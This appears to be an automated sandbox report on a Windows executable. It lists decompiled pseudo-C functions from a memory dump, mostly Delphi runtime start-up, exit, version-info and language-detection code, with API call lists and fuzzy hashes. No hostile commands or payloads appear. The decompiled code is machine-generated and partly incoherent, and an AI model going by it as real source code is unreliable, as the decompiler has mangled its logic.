                                                						goto L8;
                                                					} else {
                                                						_t20 = E00404558();
                                                						_t44 = _t20;
                                                						if(_t20 == 0) {
                                                							goto L14;
                                                						} else {
                                                							goto L13;
                                                						}
                                                						do {
                                                							L13:
                                                							E00404EA4(_t44);
                                                							_t23 = E00404558();
                                                							_t44 = _t23;
                                                						} while (_t23 != 0);
                                                						goto L14;
                                                					}
                                                				} else {
                                                					do {
                                                						 *0x500050 = 0;
                                                						 *((intOrPtr*)( *0x500050))();
                                                					} while ( *0x500050 != 0);
                                                					L8:
                                                					while(1) {
                                                					}
                                                				}
                                                			}









                                                0x004067be
                                                0x004067c0
                                                0x004067c5
                                                0x004067cc
                                                0x004067cc
                                                0x004067d8
                                                0x004067ec
                                                0x004067f6
                                                0x004067f6
                                                0x004067ff
                                                0x00406819
                                                0x0040681d
                                                0x00406826
                                                0x00406826
                                                0x0040682d
                                                0x0040684c
                                                0x0040684c
                                                0x00406855
                                                0x0040685c
                                                0x00406861
                                                0x00406863
                                                0x00406868
                                                0x0040686b
                                                0x0040686b
                                                0x0040686e
                                                0x00406871
                                                0x00406878
                                                0x00406878
                                                0x00406871
                                                0x00406861
                                                0x0040687f
                                                0x00406888
                                                0x0040688a
                                                0x0040688a
                                                0x00406891
                                                0x00406895
                                                0x00406895
                                                0x0040689d
                                                0x004068a6
                                                0x004068a8
                                                0x004068a8
                                                0x004068b1
                                                0x004068b1
                                                0x004068c3
                                                0x004068c3
                                                0x004068c5
                                                0x004068c6
                                                0x00000000
                                                0x0040682f
                                                0x0040682f
                                                0x00406834
                                                0x00406838
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040683a
                                                0x0040683a
                                                0x0040683c
                                                0x00406841
                                                0x00406846
                                                0x00406848
                                                0x00000000
                                                0x0040683a
                                                0x00406807
                                                0x00406807
                                                0x0040680e
                                                0x00406811
                                                0x00406813
                                                0x00000000
                                                0x00406819
                                                0x00000000
                                                0x00406819

                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 004067DA
                                                • FreeLibrary.KERNEL32(00400000,?,?,004FC554,?,004068DE,004045A3,004045EA,?,?,00404603), ref: 00406878
                                                • ExitProcess.KERNEL32(00000000,?,?,004FC554,?,004068DE,004045A3,004045EA,?,?,00404603), ref: 004068B1
                                                  • Part of subcall function 0040670C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 00406745
                                                  • Part of subcall function 0040670C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 0040674B
                                                  • Part of subcall function 0040670C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554), ref: 00406766
                                                  • Part of subcall function 0040670C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA), ref: 0040676C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                • String ID: MZP
                                                • API String ID: 3490077880-2889622443
                                                • Opcode ID: 661a889378b60e9f03aeb24257628d88f9b135a1cf69fca45814ad682c619eba
                                                • Instruction ID: 2cef897a65c3f9f24c974bef2023fa5822139320d2324ab680b78707f6b3ff79
                                                • Opcode Fuzzy Hash: 661a889378b60e9f03aeb24257628d88f9b135a1cf69fca45814ad682c619eba
                                                • Instruction Fuzzy Hash: 6E315C21A013519FEB21BB7A844871B76E46F04318F16883FE447A72D2D7BCD8A4CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0040679C() {
                                                				intOrPtr* _t14;
                                                				void* _t23;
                                                				void* _t26;
                                                				intOrPtr _t34;
                                                				void* _t50;
                                                				struct HINSTANCE__* _t53;
                                                				void* _t64;
                                                
                                                				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
                                                				if( *0x4fd004 != 0) {
                                                					E00406684();
                                                					E0040670C(_t50);
                                                					 *0x4fd004 = 0;
                                                				}
                                                				if( *0x502bc8 != 0 && GetCurrentThreadId() ==  *0x502bf0) {
                                                					E004063DC(0x502bc4);
                                                					E004066E0(0x502bc4);
                                                				}
                                                				if( *0x00502BBC != 0 ||  *0x500050 == 0) {
                                                					L9:
                                                					if( *((char*)(0x502bbc)) == 2 &&  *0x4fd000 == 0) {
                                                						 *0x00502BA0 = 0;
                                                					}
                                                					if( *((char*)(0x502bbc)) != 0) {
                                                						L15:
                                                						E00406404();
                                                						if( *((char*)(0x502bbc)) <= 1 ||  *0x4fd000 != 0) {
                                                							_t18 =  *0x00502BA4;
                                                							if( *0x00502BA4 != 0) {
                                                								E00409A70(_t18);
                                                								_t34 =  *((intOrPtr*)(0x502ba4));
                                                								_t8 = _t34 + 0x10; // 0x400000
                                                								_t53 =  *_t8;
                                                								_t9 = _t34 + 4; // 0x400000
                                                								if(_t53 !=  *_t9 && _t53 != 0) {
                                                									FreeLibrary(_t53);
                                                								}
                                                							}
                                                						}
                                                						E004063DC(0x502b94);
                                                						if( *((char*)(0x502bbc)) == 1) {
                                                							 *0x00502BB8();
                                                						}
                                                						if( *((char*)(0x502bbc)) != 0) {
                                                							E004066E0(0x502b94);
                                                						}
                                                						if( *0x502b94 == 0) {
                                                							if( *0x500034 != 0) {
                                                								 *0x500034();
                                                							}
                                                							ExitProcess( *0x4fd000); // executed
                                                						}
                                                						memcpy(0x502b94,  *0x502b94, 0xc << 2);
                                                						_t64 = _t64 + 0xc;
                                                						0x4fd000 = 0x4fd000;
                                                						0x502b94 = 0x502b94;
                                                						goto L9;
                                                					} else {
                                                						_t23 = E00404558();
                                                						_t48 = _t23;
                                                						if(_t23 == 0) {
                                                							goto L15;
                                                						} else {
                                                							goto L14;
                                                						}
                                                						do {
                                                							L14:
                                                							E00404EA4(_t48);
                                                							_t26 = E00404558();
                                                							_t48 = _t26;
                                                						} while (_t26 != 0);
                                                						goto L15;
                                                					}
                                                				} else {
                                                					do {
                                                						 *0x500050 = 0;
                                                						 *((intOrPtr*)( *0x500050))();
                                                					} while ( *0x500050 != 0);
                                                					L9:
                                                					while(1) {
                                                					}
                                                				}
                                                			}










                                                0x0040679e
                                                0x004067be
                                                0x004067c0
                                                0x004067c5
                                                0x004067cc
                                                0x004067cc
                                                0x004067d8
                                                0x004067ec
                                                0x004067f6
                                                0x004067f6
                                                0x004067ff
                                                0x00406819
                                                0x0040681d
                                                0x00406826
                                                0x00406826
                                                0x0040682d
                                                0x0040684c
                                                0x0040684c
                                                0x00406855
                                                0x0040685c
                                                0x00406861
                                                0x00406863
                                                0x00406868
                                                0x0040686b
                                                0x0040686b
                                                0x0040686e
                                                0x00406871
                                                0x00406878
                                                0x00406878
                                                0x00406871
                                                0x00406861
                                                0x0040687f
                                                0x00406888
                                                0x0040688a
                                                0x0040688a
                                                0x00406891
                                                0x00406895
                                                0x00406895
                                                0x0040689d
                                                0x004068a6
                                                0x004068a8
                                                0x004068a8
                                                0x004068b1
                                                0x004068b1
                                                0x004068c3
                                                0x004068c3
                                                0x004068c5
                                                0x004068c6
                                                0x00000000
                                                0x0040682f
                                                0x0040682f
                                                0x00406834
                                                0x00406838
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040683a
                                                0x0040683a
                                                0x0040683c
                                                0x00406841
                                                0x00406846
                                                0x00406848
                                                0x00000000
                                                0x0040683a
                                                0x00406807
                                                0x00406807
                                                0x0040680e
                                                0x00406811
                                                0x00406813
                                                0x00000000
                                                0x00406819
                                                0x00000000
                                                0x00406819

                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 004067DA
                                                • FreeLibrary.KERNEL32(00400000,?,?,004FC554,?,004068DE,004045A3,004045EA,?,?,00404603), ref: 00406878
                                                • ExitProcess.KERNEL32(00000000,?,?,004FC554,?,004068DE,004045A3,004045EA,?,?,00404603), ref: 004068B1
                                                  • Part of subcall function 0040670C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 00406745
                                                  • Part of subcall function 0040670C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 0040674B
                                                  • Part of subcall function 0040670C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554), ref: 00406766
                                                  • Part of subcall function 0040670C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA), ref: 0040676C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                • String ID: MZP
                                                • API String ID: 3490077880-2889622443
                                                • Opcode ID: bd2e960c19dd2ab2e713dd8a2671f13d410aa28cfe46dd547e52860ab6adaf01
                                                • Instruction ID: c02aab792ff7e2e5eb0b8afe4bda8f566001a16be7e09a702f86af92f89a990d
                                                • Opcode Fuzzy Hash: bd2e960c19dd2ab2e713dd8a2671f13d410aa28cfe46dd547e52860ab6adaf01
                                                • Instruction Fuzzy Hash: F9312B21A013419FEB21BF76849971A7BE46F04318F16883FE446A72D2D77CD8A4CB1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E004FC000(void* __ecx, void* __edx) {
                                                				intOrPtr _t19;
                                                				intOrPtr _t22;
                                                
                                                				_push(_t22);
                                                				_push(0x4fc0d7);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t22;
                                                				 *0x500988 =  *0x500988 - 1;
                                                				if( *0x500988 < 0) {
                                                					E00404C98();
                                                					E0040426C();
                                                					SetThreadLocale(0x400); // executed
                                                					E004088C4();
                                                					 *0x4fd00c = 2;
                                                					 *0x50001c = 0x402774;
                                                					 *0x500020 = 0x40277c;
                                                					 *0x500056 = 2;
                                                					 *0x50005c = E0040AFF4();
                                                					 *0x500008 = 0x408078;
                                                					E00404CF0(E00404CD4());
                                                					 *0x500064 = 0xd7b0;
                                                					 *0x500340 = 0xd7b0;
                                                					 *0x50061c = 0xd7b0;
                                                					 *0x50004c = GetCommandLineW();
                                                					 *0x500048 = E004028D4();
                                                					 *0x500978 = GetACP();
                                                					 *0x50097c = 0x4b0;
                                                					 *0x500040 = GetCurrentThreadId();
                                                					E0040B008();
                                                				}
                                                				_pop(_t19);
                                                				 *[fs:eax] = _t19;
                                                				_push(0x4fc0de);
                                                				return 0;
                                                			}





                                                0x004fc005
                                                0x004fc006
                                                0x004fc00b
                                                0x004fc00e
                                                0x004fc011
                                                0x004fc018
                                                0x004fc01e
                                                0x004fc023
                                                0x004fc02d
                                                0x004fc032
                                                0x004fc037
                                                0x004fc03e
                                                0x004fc048
                                                0x004fc052
                                                0x004fc05e
                                                0x004fc063
                                                0x004fc072
                                                0x004fc077
                                                0x004fc080
                                                0x004fc089
                                                0x004fc097
                                                0x004fc0a1
                                                0x004fc0ab
                                                0x004fc0b0
                                                0x004fc0bf
                                                0x004fc0c4
                                                0x004fc0c4
                                                0x004fc0cb
                                                0x004fc0ce
                                                0x004fc0d1
                                                0x004fc0d6

                                                APIs
                                                • SetThreadLocale.KERNEL32(00000400,00000000,004FC0D7), ref: 004FC02D
                                                  • Part of subcall function 004088C4: InitializeCriticalSection.KERNEL32(00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088C9
                                                  • Part of subcall function 004088C4: GetVersion.KERNEL32(00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088D7
                                                  • Part of subcall function 004088C4: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088FE
                                                  • Part of subcall function 004088C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408904
                                                  • Part of subcall function 004088C4: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 00408918
                                                  • Part of subcall function 004088C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040891E
                                                  • Part of subcall function 004088C4: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 00408932
                                                  • Part of subcall function 004088C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408938
                                                  • Part of subcall function 0040AFF4: GetSystemInfo.KERNEL32 ref: 0040AFF8
                                                • GetCommandLineW.KERNEL32(00000400,00000000,004FC0D7), ref: 004FC092
                                                  • Part of subcall function 004028D4: GetStartupInfoW.KERNEL32 ref: 004028E5
                                                • GetACP.KERNEL32(00000400,00000000,004FC0D7), ref: 004FC0A6
                                                • GetCurrentThreadId.KERNEL32 ref: 004FC0BA
                                                  • Part of subcall function 0040B008: GetVersion.KERNEL32(004FC0C9,00000400,00000000,004FC0D7), ref: 0040B008
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                • String ID:
                                                • API String ID: 2740004594-0
                                                • Opcode ID: 86b7be6f3b07a36d57f59285415004388bae5a5c4b0e3247f763d86c356b9e6d
                                                • Instruction ID: f31f0f49541c0d6808f0d04e770d596d3d4622fdfde316b3bf832ad6c22a9402
                                                • Opcode Fuzzy Hash: 86b7be6f3b07a36d57f59285415004388bae5a5c4b0e3247f763d86c356b9e6d
                                                • Instruction Fuzzy Hash: 0E111FB440434499E755FB76A91E71D3B90AB55308F81943EE604672E2DBBC0008AB6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E00418750(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
                                                				char _v8;
                                                				char _v9;
                                                				int _v16;
                                                				void* _v20;
                                                				void* _v24;
                                                				int _v28;
                                                				int _t33;
                                                				int _t43;
                                                				int _t64;
                                                				intOrPtr _t72;
                                                				intOrPtr _t74;
                                                				signed int* _t77;
                                                				signed int* _t79;
                                                				void* _t81;
                                                				void* _t82;
                                                				intOrPtr _t83;
                                                
                                                				_t81 = _t82;
                                                				_t83 = _t82 + 0xffffffe8;
                                                				_v8 = 0;
                                                				_t77 = __ecx;
                                                				_t79 = __edx;
                                                				_push(_t81);
                                                				_push(0x418850);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t83;
                                                				_v9 = 0;
                                                				E00406CF4( &_v8, __eax);
                                                				E00406E5C( &_v8);
                                                				_t33 = GetFileVersionInfoSizeW(E00407330(_v8),  &_v16); // executed
                                                				_t64 = _t33;
                                                				if(_t64 == 0) {
                                                					_pop(_t72);
                                                					 *[fs:eax] = _t72;
                                                					_push(0x418857);
                                                					return E004069A8( &_v8);
                                                				} else {
                                                					_v20 = E004044B4(_t64);
                                                					_push(_t81);
                                                					_push(0x418833);
                                                					_push( *[fs:edx]);
                                                					 *[fs:edx] = _t83;
                                                					_t43 = GetFileVersionInfoW(E00407330(_v8), _v16, _t64, _v20); // executed
                                                					if(_t43 != 0 && VerQueryValueW(_v20, 0x418864,  &_v24,  &_v28) != 0) {
                                                						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
                                                						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
                                                						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
                                                						_v9 = 1;
                                                					}
                                                					_pop(_t74);
                                                					 *[fs:eax] = _t74;
                                                					_push(0x41883a);
                                                					return E004044D0(_v20);
                                                				}
                                                			}



















                                                0x00418751
                                                0x00418753
                                                0x0041875b
                                                0x0041875e
                                                0x00418760
                                                0x00418766
                                                0x00418767
                                                0x0041876c
                                                0x0041876f
                                                0x00418772
                                                0x0041877b
                                                0x00418783
                                                0x00418795
                                                0x0041879a
                                                0x0041879e
                                                0x0041883c
                                                0x0041883f
                                                0x00418842
                                                0x0041884f
                                                0x004187a4
                                                0x004187ab
                                                0x004187b0
                                                0x004187b1
                                                0x004187b6
                                                0x004187b9
                                                0x004187ce
                                                0x004187d5
                                                0x004187fd
                                                0x00418806
                                                0x00418817
                                                0x00418819
                                                0x00418819
                                                0x0041881f
                                                0x00418822
                                                0x00418825
                                                0x00418832
                                                0x00418832

                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00418850), ref: 00418795
                                                • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00418833,?,00000000,?,00000000,00418850), ref: 004187CE
                                                • VerQueryValueW.VERSION(?,00418864,?,?,00000000,?,00000000,?,00000000,00418833,?,00000000,?,00000000,00418850), ref: 004187E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileInfoVersion$QuerySizeValue
                                                • String ID:
                                                • API String ID: 2179348866-0
                                                • Opcode ID: c3b0b502d5035f5daf200de3a4cc46812dc0de1d7565b881b145eb8ff7d36e21
                                                • Instruction ID: 71b798d31b8a8db47d3bffcaead5b231bc9b8ec913ef69a6c713ececfaec169f
                                                • Opcode Fuzzy Hash: c3b0b502d5035f5daf200de3a4cc46812dc0de1d7565b881b145eb8ff7d36e21
                                                • Instruction Fuzzy Hash: ED312471A04209AFDB01EFA9CD41EAEB7F9EB48704B91447AF944E3241DB78DD00DB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404398() {
                                                				intOrPtr _t13;
                                                				intOrPtr* _t14;
                                                				int _t18;
                                                				intOrPtr* _t23;
                                                				void* _t25;
                                                				void* _t26;
                                                				void* _t28;
                                                				void* _t31;
                                                
                                                				_t28 =  *0x00500AD8;
                                                				while(_t28 != 0x500ad4) {
                                                					_t2 = _t28 + 4; // 0x500ad4
                                                					VirtualFree(_t28, 0, 0x8000); // executed
                                                					_t28 =  *_t2;
                                                				}
                                                				_t25 = 0x37;
                                                				_t13 = 0x4fd064;
                                                				do {
                                                					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
                                                					 *((intOrPtr*)(_t13 + 8)) = _t13;
                                                					 *((intOrPtr*)(_t13 + 0x10)) = 1;
                                                					 *((intOrPtr*)(_t13 + 0x14)) = 0;
                                                					_t13 = _t13 + 0x20;
                                                					_t25 = _t25 - 1;
                                                				} while (_t25 != 0);
                                                				 *0x500ad4 = 0x500ad4;
                                                				 *0x00500AD8 = 0x500ad4;
                                                				_t26 = 0x400;
                                                				_t23 = 0x500b74;
                                                				do {
                                                					_t14 = _t23;
                                                					 *_t14 = _t14;
                                                					_t8 = _t14 + 4; // 0x500b74
                                                					 *_t8 = _t14;
                                                					_t23 = _t23 + 8;
                                                					_t26 = _t26 - 1;
                                                				} while (_t26 != 0);
                                                				 *0x500af0 = 0;
                                                				E004049A8(0x500af4, 0x80);
                                                				_t18 = 0;
                                                				 *0x500aec = 0;
                                                				_t31 =  *0x00502B7C;
                                                				while(_t31 != 0x502b78) {
                                                					_t18 = VirtualFree(_t31, 0, 0x8000); // executed
                                                					_t31 =  *(_t31 + 4);
                                                				}
                                                				 *0x502b78 = 0x502b78;
                                                				 *0x00502B7C = 0x502b78;
                                                				return _t18;
                                                			}











                                                0x004043a6
                                                0x004043bd
                                                0x004043ab
                                                0x004043b6
                                                0x004043bb
                                                0x004043bb
                                                0x004043c1
                                                0x004043c6
                                                0x004043cb
                                                0x004043cd
                                                0x004043d2
                                                0x004043d5
                                                0x004043de
                                                0x004043e1
                                                0x004043e4
                                                0x004043e4
                                                0x004043e7
                                                0x004043e9
                                                0x004043ec
                                                0x004043f1
                                                0x004043f6
                                                0x004043f6
                                                0x004043f8
                                                0x004043fa
                                                0x004043fa
                                                0x004043fd
                                                0x00404400
                                                0x00404400
                                                0x00404405
                                                0x00404416
                                                0x0040441b
                                                0x0040441d
                                                0x00404422
                                                0x00404439
                                                0x00404432
                                                0x00404437
                                                0x00404437
                                                0x0040443d
                                                0x0040443f
                                                0x00404446

                                                APIs
                                                • VirtualFree.KERNEL32(00500AD4,00000000,00008000,?,?,?,?,00404498,0040B166,00000000,0040B184), ref: 004043B6
                                                • VirtualFree.KERNEL32(?,00000000,00008000,00500AD4,00000000,00008000,?,?,?,?,00404498,0040B166,00000000,0040B184), ref: 00404432
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID: x+P
                                                • API String ID: 1263568516-3099085927
                                                • Opcode ID: cd4a7aff0d9da6c28d34d244d3cbb74c655cdd9999bc532fac1e385591dc2adf
                                                • Instruction ID: ad64f2d33904e0bf9d86bea76d341dbd416e76c2be8d3ab623fe03c609c213da
                                                • Opcode Fuzzy Hash: cd4a7aff0d9da6c28d34d244d3cbb74c655cdd9999bc532fac1e385591dc2adf
                                                • Instruction Fuzzy Hash: EA118CB17046108FC7648F189941B2ABAE0FB88714F15807EE649EB7C1D778AC028B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E0040976C(intOrPtr __eax, void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi) {
                                                				intOrPtr _v8;
                                                				signed int _v12;
                                                				char _v16;
                                                				char _v20;
                                                				char _v24;
                                                				char _v28;
                                                				signed int _t41;
                                                				signed short _t43;
                                                				signed short _t46;
                                                				signed int _t60;
                                                				intOrPtr _t69;
                                                				void* _t80;
                                                				signed int* _t82;
                                                				intOrPtr _t85;
                                                
                                                				_t80 = __edi;
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_t82 = __ecx;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				E00406A8C(_v8);
                                                				E00406A8C(_v12);
                                                				_push(_t85);
                                                				_push(0x409883);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t85;
                                                				E004069A8(__ecx);
                                                				if(_v12 == 0) {
                                                					L14:
                                                					_pop(_t69);
                                                					 *[fs:eax] = _t69;
                                                					_push(E0040988A);
                                                					return E00406A08( &_v28, 6);
                                                				}
                                                				E00406CF4( &_v20, _v12);
                                                				_t41 = _v12;
                                                				if(_t41 != 0) {
                                                					_t41 =  *(_t41 - 4);
                                                				}
                                                				_t60 = _t41;
                                                				if(_t60 < 1) {
                                                					L7:
                                                					_t43 = E004094A8(_v8, _t60,  &_v16, _t82); // executed
                                                					_t91 = _v16;
                                                					if(_v16 == 0) {
                                                						L004027F4();
                                                						E00408E58(_t43, _t60,  &_v24, _t80, _t82);
                                                						_t46 = E004095D4(_v20, _t60, _t82, _v24, _t80, _t82, __eflags); // executed
                                                						__eflags =  *_t82;
                                                						if( *_t82 == 0) {
                                                							__eflags =  *0x502c08;
                                                							if( *0x502c08 == 0) {
                                                								L004027FC();
                                                								E00408E58(_t46, _t60,  &_v28, _t80, _t82);
                                                								E004095D4(_v20, _t60, _t82, _v28, _t80, _t82, __eflags);
                                                							}
                                                						}
                                                						__eflags =  *_t82;
                                                						if(__eflags == 0) {
                                                							E004096A0(_v20, _t60, _t82, __eflags); // executed
                                                						}
                                                					} else {
                                                						E004095D4(_v20, _t60, _t82, _v16, _t80, _t82, _t91);
                                                					}
                                                					goto L14;
                                                				}
                                                				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
                                                					_t60 = _t60 - 1;
                                                					__eflags = _t60;
                                                					if(_t60 != 0) {
                                                						continue;
                                                					}
                                                					goto L7;
                                                				}
                                                				E00407678(_v12, _t60, 1,  &_v20);
                                                				goto L7;
                                                			}

















                                                0x0040976c
                                                0x0040976f
                                                0x00409771
                                                0x00409773
                                                0x00409775
                                                0x00409777
                                                0x00409779
                                                0x0040977b
                                                0x0040977c
                                                0x0040977d
                                                0x0040977f
                                                0x00409782
                                                0x00409788
                                                0x00409790
                                                0x00409797
                                                0x00409798
                                                0x0040979d
                                                0x004097a0
                                                0x004097a5
                                                0x004097ae
                                                0x00409868
                                                0x0040986a
                                                0x0040986d
                                                0x00409870
                                                0x00409882
                                                0x00409882
                                                0x004097ba
                                                0x004097bf
                                                0x004097c4
                                                0x004097c9
                                                0x004097c9
                                                0x004097cb
                                                0x004097d0
                                                0x004097f7
                                                0x004097fd
                                                0x00409802
                                                0x00409806
                                                0x00409817
                                                0x0040981f
                                                0x0040982c
                                                0x00409831
                                                0x00409834
                                                0x00409836
                                                0x0040983d
                                                0x0040983f
                                                0x00409847
                                                0x00409854
                                                0x00409854
                                                0x0040983d
                                                0x00409859
                                                0x0040985c
                                                0x00409863
                                                0x00409863
                                                0x00409808
                                                0x00409810
                                                0x00409810
                                                0x00000000
                                                0x00409806
                                                0x004097d2
                                                0x004097f2
                                                0x004097f3
                                                0x004097f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004097f5
                                                0x004097eb
                                                0x00000000

                                                APIs
                                                • GetUserDefaultUILanguage.KERNEL32(00000000,00409883,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040990A,00000000,?,00000105), ref: 00409817
                                                • GetSystemDefaultUILanguage.KERNEL32(00000000,00409883,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040990A,00000000,?,00000105), ref: 0040983F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: DefaultLanguage$SystemUser
                                                • String ID:
                                                • API String ID: 384301227-0
                                                • Opcode ID: 8ccc880a4083f4cf67cec9c159a58c1f28253716aa2231727ad32c9a7054b76d
                                                • Instruction ID: 4781f68dbc7189501f499a975775e18bb8ad6eb86817993ed410f212fd684c1a
                                                • Opcode Fuzzy Hash: 8ccc880a4083f4cf67cec9c159a58c1f28253716aa2231727ad32c9a7054b76d
                                                • Instruction Fuzzy Hash: C7313A31A102099BDB14EF9AC882BAEB7B4EB49704F50847BE401B33D2DB789D45DB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00409890(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				char _v8;
                                                				short _v530;
                                                				char _v536;
                                                				char _v540;
                                                				void* _t44;
                                                				intOrPtr _t45;
                                                				void* _t49;
                                                				void* _t52;
                                                
                                                				_v536 = 0;
                                                				_v540 = 0;
                                                				_v8 = 0;
                                                				_t49 = __eax;
                                                				_push(_t52);
                                                				_push(0x40994a);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t52 + 0xfffffde8;
                                                				GetModuleFileNameW(0,  &_v530, 0x105);
                                                				E00407388( &_v536, _t49);
                                                				_push(_v536);
                                                				E004073C4( &_v540, 0x105,  &_v530);
                                                				_pop(_t44); // executed
                                                				E0040976C(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
                                                				if(_v8 != 0) {
                                                					LoadLibraryExW(E00407330(_v8), 0, 2);
                                                				}
                                                				_pop(_t45);
                                                				 *[fs:eax] = _t45;
                                                				_push(E00409951);
                                                				E00406A08( &_v540, 2);
                                                				return E004069A8( &_v8);
                                                			}











                                                0x0040989d
                                                0x004098a3
                                                0x004098a9
                                                0x004098ac
                                                0x004098b0
                                                0x004098b1
                                                0x004098b6
                                                0x004098b9
                                                0x004098cc
                                                0x004098d9
                                                0x004098e4
                                                0x004098f6
                                                0x00409904
                                                0x00409905
                                                0x0040990e
